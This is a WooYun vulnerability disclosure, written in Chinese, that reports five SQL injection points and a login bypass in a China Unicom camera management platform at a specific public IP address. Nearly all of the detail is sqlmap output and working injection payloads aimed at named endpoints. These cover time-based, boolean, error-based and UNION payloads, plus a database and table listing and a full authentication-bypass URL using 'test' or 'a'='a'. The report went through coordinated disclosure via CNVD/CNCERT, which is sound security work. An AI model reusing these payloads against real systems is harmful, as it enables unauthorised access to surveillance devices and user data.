当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128242

漏洞标题:中国联通某摄像管理平台存在多处SQL注入漏洞且可用万能密码登录任意账户

相关厂商:中国联通

漏洞作者: 浮萍

提交时间:2015-07-22 11:00

修复时间:2015-09-09 22:08

公开时间:2015-09-09 22:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-26: 厂商已经确认,细节仅向厂商公开
2015-08-05: 细节向核心白帽子及相关领域专家公开
2015-08-15: 细节向普通白帽子公开
2015-08-25: 细节向实习白帽子公开
2015-09-09: 细节向公众公开

简要描述:

多处SQL 注入
有的需要登录(随意注册帐号即可),有的无需登录
万能密码登录

详细说明:

依旧是http://210.22.8.98/
随便注册一个账户
第一处:在子帐号管理处
输入用户名 点查询 然后抓包

选区_012.png


http://210.22.8.98/user/manageUser.action?deviceName=&serialNo=&userName=admin

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: deviceName (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: deviceName=') AND (SELECT * FROM (SELECT(SLEEP(5)))YWdr) AND ('LQFC'='LQFC&serialNo=&userName=admin
---
[22:31:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0.12


数据库

available databases [5]:
[*] db_register
[*] dserver_1
[*] information_schema
[*] mysql
[*] test


current database:    'dserver_1'


Database: dserver_1
[6 tables]
+---------------+
| DeviceAssign  |
| DvipDevice    |
| GroupInfo     |
| UserAppServer |
| UserDevice    |
| UserInfo      |
+---------------+


UserInfo中用户923

选区_013.png


漏洞证明:

第二处;添加摄像机

选区_014.png


抓包

http://210.22.8.98/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=%2Fdevice%2FmanageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string%3Aa&c0-param1=string%3Aa%27&batchId=15&locale=zh_CN


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 208 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=-3416' OR 4230=4230#&batchId=14&locale=zh_CN
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=-6325' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (1583=1583) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&batchId=14&locale=zh_CN
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=string:a' AND (SELECT * FROM (SELECT(SLEEP(5)))DgzL)#&batchId=14&locale=zh_CN
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrDeviceInfo.validteDevice.dwr?callCount=1&page=/device/manageDevice.action&httpSessionId=&scriptSessionId=1437490048942&c0-scriptName=DwrDeviceInfo&c0-methodName=validteDevice&c0-id=0&c0-param0=string:a&c0-param1=string:a' UNION ALL SELECT CONCAT(0x71707a6b71,0x67557570654a6e4b6d6d,0x71626a7171),NULL,NULL#&batchId=14&locale=zh_CN
---
[23:15:22] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0.12


---
第三处:用户设置->授权管理
WooYun: 中国联通某摄像管理平台存在SQL注入漏洞 已经提到过,而且修复了,但是仅仅提示了一下 没有真正修复
虽然提示用户名非法,但是抓包 仍能注入

选区_015.png


抓包

http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin*&batchId=2&locale=zh_CN


选区_016.png


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' AND 6848=6848 AND 'AZKS'='AZKS&batchId=2&locale=zh_CN
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' AND (SELECT 4204 FROM(SELECT COUNT(*),CONCAT(0x717a717871,(SELECT (ELT(4204=4204,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HyvO'='HyvO&batchId=2&locale=zh_CN
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' AND (SELECT * FROM (SELECT(SLEEP(5)))vlzP) AND 'YEng'='YEng&batchId=2&locale=zh_CN
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSessionId=1437491764823&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string:admin' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717871,0x4a767346447770756664,0x716b716b71)#&batchId=2&locale=zh_CN
---
[23:18:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0


第四处:登录处
http://210.22.8.98/login.action?userName=admin*&userPassword=a

GET parameter 'userName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 105 HTTP(s) requests:
---
Parameter: userName (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))gqOP) AND 'IdOb'='IdOb&userPassword=a
---
[23:25:32] [INFO] the back-end DBMS is MySQL
web application technology: JSP, Apache 2.0.64
back-end DBMS: MySQL 5.0.12


第五处 注册处

选区_017.png


前三处注入需要cookie,随便注册一个用户就行了
后面两个无需登录
估计找回密码处也未成功修复
最后再来一个万能密码登录
用户名:test' or 'a'='a
密码任意
但是需要在地址栏中输入
例如访问地址:

http://210.22.8.98/login.action?userName=test%27%20or%20%27a%27=%27a&userPassword=a


直接登录

选区_018.png


修复方案:

这套系统简直。。。

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-26 22:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理单位或软件开发 方处置。按多处风险综合评分,rank 20

最新状态:

暂无